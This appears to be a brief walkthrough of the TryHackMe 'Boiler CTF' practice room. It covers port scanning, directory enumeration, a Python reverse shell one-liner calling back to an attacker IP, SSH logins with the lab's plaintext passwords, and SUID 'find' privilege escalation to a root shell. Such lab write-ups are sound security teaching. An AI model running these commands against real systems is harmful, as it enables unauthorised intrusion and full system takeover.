Boiler CTF

Room Link: https://tryhackme.com/room/boilerctf2

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/21 - HTTP

Kali

ftp $VICTIM
ls -lah 
get .info.txt

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u http://$VICTIM/joomla -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Initial Shell

Exploit: https://www.exploit-db.com/exploits/47204

Kali

nc -lvnp 1337

Browser command

export RHOST="10.10.157.229";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

There is a file that has credentials

It was also possible to view from the browser

TCP/55007 - SSH

Kali

ssh basterd@$VICTIM -p 55007
Pass: superduperp@$$

There is a backup.sh script that is owned by user stoner, which has his credentials.

Kali

ssh stoner@$VICTIM -p 55007                                            
Pass: superduperp@$$no1knows 

Privilege Escalation

We can exploit SUID for the find command

Exploit: https://gtfobins.github.io/gtfobins/find/

Victim

find / -perm -u=s -type f 2> /dev/null 

Had to specify the full path, it doesn't work if you don't

Victim

/usr/bin/find . -exec /bin/sh -p \; -quit